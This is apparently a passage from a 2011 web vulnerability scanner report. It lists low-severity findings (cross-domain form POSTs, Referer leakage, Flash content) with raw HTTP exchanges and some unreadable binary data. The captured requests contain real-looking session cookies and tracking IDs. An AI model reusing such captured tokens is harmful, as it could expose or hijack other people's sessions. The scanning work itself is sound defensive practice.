.9$6.9"~ ".$n:.!g0....'...P.....QtJ.(..4....YwV.........re;0...<..:..3.I5...L...,. .1....^....n.Oy7......1...J.........H..).l~....5...:.Z..\Y    ....9X\.Ey+.co...'>4.(.ls..'..".i<..ZY....X.i...    |    SK.-....@..2fAZ..eI..ma...kk..)nT&.0..jOE.U1...RD.....J...l..I....G..-..^.3=........4...+..)...`..I.]...w.S/..v..h....Y.<).YV.......Zuy:]..rAv.`..J..y....JJ..+.SFjY..t.3?V...([y...(kHP..a5...~..w..V.cQ....b..Z.tE..0Y@.^..E.c.'......(s.U.Q.{.fp..}.Qy=b...Q..............;Pm.d......f...7.    5=.....e......=.|.......n......Q.........gC.25    6.+CC\U.J..?f...2.......c..K..d/.i1....?....

18.18. http://www.youtube.com/v/tYy3w4lIafA&autoplay=1  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /v/tYy3w4lIafA&autoplay=1

Request 1

GET /v/tYy3w4lIafA&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:17 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1141
Content-Type: application/x-shockwave-flash

CWS.A...x..V[s.F.>.a.k.....1n.z.i...$.6..S...2..I..E(....1..y.#3}hK................."q.3..r..........iG..=.p....s....N.4..g...W>s...ps...Ho.....=....:.ae..@..z.jY.B....=...l.<.<..Ie....
Ly....b..lnl....9...p.....6.W...Fh....ht.Gv......f...el..O..xB,Zt.........2......&.....@e......u..)Q..e..l..*......Q.q.r7d?...^....K.~e.........Jm.t......o/_.,...?......U4.....2....D    .9/Jd..t..T.Qu...d.:..^`..&.........F..._D41...J..m.....X.....24...Ia....f]...j...og........i.M.=%6e..=..M.\.fP.|.{..Hd.....B..<....G....XU.    .+ID    .....O..4..:..-..XV.{...@}.q.kFB...s    ..=.4.1...P...#].cJ.Wx.....>g.....G..b_.....^pF'(D.i$!X...4+.Q....W5....TWA4.........!Z^K.8......;d....0...k.)..    q    ..H..
.......L. E..x%......i.t........I_...`aT.ki.%C..~.C....6..q....hd.a.-/.Ji\,.0i...|...l]....@...g^j..fQ...P_$..5h..7
..d.(.OX.:....d..>.~..z..gA..IU......HF+..\.V..[...2.J...#..'.l...~;.S..\.^......)...g..h.....X...-...v.*.......\....A"...S.p]V..SK<g...qO..S"m...+"mV......1...q...lV.E.Os.K6...K[d..y......b...._....2&^E.e|.k
.j..I).F.....}u.:}^P.ky......-......U..]4........=.)....<....w.b.]5O.ju.}.._..E(.W,m>....eh.l...m.....C{.8..0............... .a.1..D.R

Request 2

GET /v/tYy3w4lIafA&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1130
Content-Type: application/x-shockwave-flash

CWS.*...x..V[S.F.>.e$.I.$..!.m....8\.0m.0)...kg:..fm.e.YR.+...y..3}hK.....].BnS.Y.....9G...<....p?.....~N75..c.7.<....n........b'.....5.<.....W..a...=^|.:.2\...I.mj..F........l.<*?..Iy....
Ly..s...>....D.=.r.X.....<,n<...Q....=
Po.>.-...>-4...(c..}.~..b.....h..^...) ............[eT......[.5JQ....c
....^BU..K...p...q.?>,
...::....Z...=.a....;..|....z...#{.<..iv.W....&@$(........".).Qu..zd...[....'.........z..._D41......m..]...._M..kM.......,4R......j..)q(+v.A.j....Au....o .Y.....a....B
}......xn...D.p.....I..%5..1....mW..6&....G_3..x..GX........'......P.G.z..H..}.s.].l.x.. ............ .F...kL...%`..r..\..L..D...mzQ..,....D...,n#.1,.(V.....^.E9.F..G.......f.....8..Rti..O/..'..>.A.S..!.S..%.u
..@Q^M....!...M<22.L......h..0...b.4/.D.4.A...D3[..\.X.[..3/5.R.(...P_&..5...7....i..&G..1u....@.    ....S...].&.%..".. ..\}r.[    .oa..4.J...#..'.l..I.....w....x.]{:esW.,.....S.....y........sFV8c.W...9H._T..,\........i8c.S...H.?..HkHP......|.9..!....(.nNb1.|.\9".....@...E.c.)...p...9.*H/..^S.T..L......'.}u.:}^...r?'....,......U.L].......T.=.)._....Y..;y...X'{.....F.F."..+.6....b....n.`[.*|....0N.....g.v........Kt.....?.?....

19. Cross-domain POST  previous  next
There are 6 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


19.1. http://www.atlassian.com/software/fisheye/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlassian.com
Path:   /software/fisheye/

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

Request

GET /software/fisheye/ HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/jira/pricing.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.6.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:21:53 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 20438


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


<head>

<title>
FishEye - Subversion, Git, Mercurial, CVS,
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.2. http://www.atlassian.com/software/greenhopper/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlassian.com
Path:   /software/greenhopper/

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

Request

GET /software/greenhopper/ HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/fisheye/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.9.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:11 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 21953


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


<head>

<title>
Truly agile project management with GreenHo
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.3. http://www.atlassian.com/software/jira/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlassian.com
Path:   /software/jira/

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

Request

GET /software/jira/?gclid=CLiIoYbNjaoCFcFo4AodkV0lxw HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:23 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 20269


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


<head>

<title>
Bug, Issue and Project Tracking for Softwar
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.4. http://www.atlassian.com/software/jira/pricing.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlassian.com
Path:   /software/jira/pricing.jsp

Issue detail

The page contains a form which POSTs data to the domain cl.exct.net. The form contains the following fields:

Request

GET /software/jira/pricing.jsp HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/jira/?gclid=CLiIoYbNjaoCFcFo4AodkV0lxw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSessionID=1148063633; CDLASTPAGEID=69200790; JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.3.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:21:23 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46278


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


<head>

<title>
Get Started For $10 - Pricing - JIRA
</
...[SNIP]...
<li class="newsletter">
<form action="http://cl.exct.net/subscribe.aspx?lid=234098" onsubmit="pageTracker._trackEvent('Newsletter',' Signup - footer');" name="subscribeForm" method="post">
<input name="thx" value="http://www.atlassian.com/newsletter/subscribe-confirmation.jsp" type="hidden">
...[SNIP]...

19.5. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelex.com
Path:   /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 98253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="cont
...[SNIP]...
<div class="divMain" style="margin: 0 auto;">
<form name="frmMain" method="post" action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" id="frmMain">
<div class="aspNetHidden">
...[SNIP]...

19.6. http://www.mavitunasecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mavitunasecurity.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain mavitunasecurity.us1.list-manage.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.mavitunasecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11213
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:39:25 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><title>
   N
...[SNIP]...
<img src="/v2/mg/txtnewsletter.gif">
               <form action="http://mavitunasecurity.us1.list-manage.com/subscribe/post?u=7b9010b63c6aec6fce0bf4205&amp;id=c5cc913cd9"
           method="post" target="_blank">

               <input type="text" class="btn" value="" name="EMAIL" style="width: 220px" />
...[SNIP]...

20. Cross-domain Referer leakage  previous  next
There are 94 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


20.1. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:42:55 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:42:55 GMT
Last-Modified: Sun, 17 Jul 2011 20:42:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=6twZuywAYrkZnj3PjCGa8UGSBEUzkooZqU43f%2FGiyI1UXu7W6xg6VD2D0wBlPdOTT5OQE4U8evN3fFU06w2erg%3D%3D; expires=Wed, 18-Jan-2012 20:42:55 GMT; path=/
Set-Cookie: evo5_display=Lb7I6%2B93hnCmP8Ly1Y8aIz6mDQ1J3sznCNFCT7eof5ElbvVxhEDm93raeYwzidf%2FQorvxtKsBHYJrrYeSIbRYA%3D%3D; expires=Thu, 23-Jun-44591 20:42:55 GMT; path=/; domain=.netmng.com
Content-Length: 1472
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000"><SCRIPT language="JavaScript1.1"SRC="http://ad.doubleclick.net/adj/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"><IMG SRC="http://ad.doubleclick.net/ad/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

20.2. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j.ad?site=bostonglobe&adSpace=300x250&tagKey=987828525&th=20001302335&tKey=undefined&size=300x250&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8207455&a=1&rnd=8216825 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: ANON_ID=a4nWgZbSZdIis9TnMTYekc374qY9Xj09Hp2T2xg64xYZav67kIJkxQEEf2ojK1s35udiFgJ9Zb9lvSiGZa3mRsVG8ESjSPPsTgrsd3WQEVjYA9bNxuX8tU6X2XXJGmO5ZarAZckFWJdf0TR2Zav5FD4XrJ1ZdjbZc5A0po8XJGqLZaF32Aov5WZckUiyDCF4qFuZctawJUmSUByy40hrAuONZbFkUbp8r6ebf5StDBmgC2wc6E7hfApoY5yiDSZdYMZbZb2ZacswQtQfUGotCtpjsM

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a2nXSoP3rTwoiAyWrVjrMprETAW3VoE9iJ3ZaC9NKjcuSYjAwNoUderTsfhtT7CvHqlhNolZbO3wZb6Pj4CR6BnIoBDy2sqRgXaUv3as0WA1QsjE1GEf9Py6TCc5J5uvjINffJUb8VpXxo3EC0OnVPlJlIZdj8Wbw3Zd8QPACFYZb9BiSfcRlyHZaZcfatO3p6twFN4WI9yhVTroynMZdnfurN7oBm8cZd5aZbBaLZdkK2drax8oHt1ZccxUs8DiE065deiBlyn13J5RFVXrwTHxWFecJ; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:44:26 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1147
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/300x250/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1725274878 = [\r\n
...[SNIP]...

20.3. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j.ad?site=bostonglobe&adSpace=728x90&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fboston.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8117328&a=1&rnd=8110671 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: ANON_ID=aNnUgjyg6ANFA7ubQCktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGEvQjB0C4uEKV7RRQZa3O3qjyKF42ZaMEJ4b32BDDZdVMg6tF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Qm2emyb9ysdZdOpagBZdlUBA6RKMem3yjH2tm2TcZbG4aZbrxc

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aNnWgZbyg6ANFA7ubQBktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGFfQjB0C4uFKV7RRQZa3O3qjygF42ZaMEJ4b32BDDZdVMg6sF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Q62emyb9ysdZdOpagBZdlUBA6RKMgwHPMt1ofr38xf9UMXVrqeZdWOePb28Rqb4pGvWd7; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:42:54 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1146
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/728x90/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1723665946 = [\r\n
...[SNIP]...

20.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.NetMining/B5146585.127

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7171
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:43:01 GMT
Expires: Tue, 19 Jul 2011 20:43:01 GMT
Discarded: true

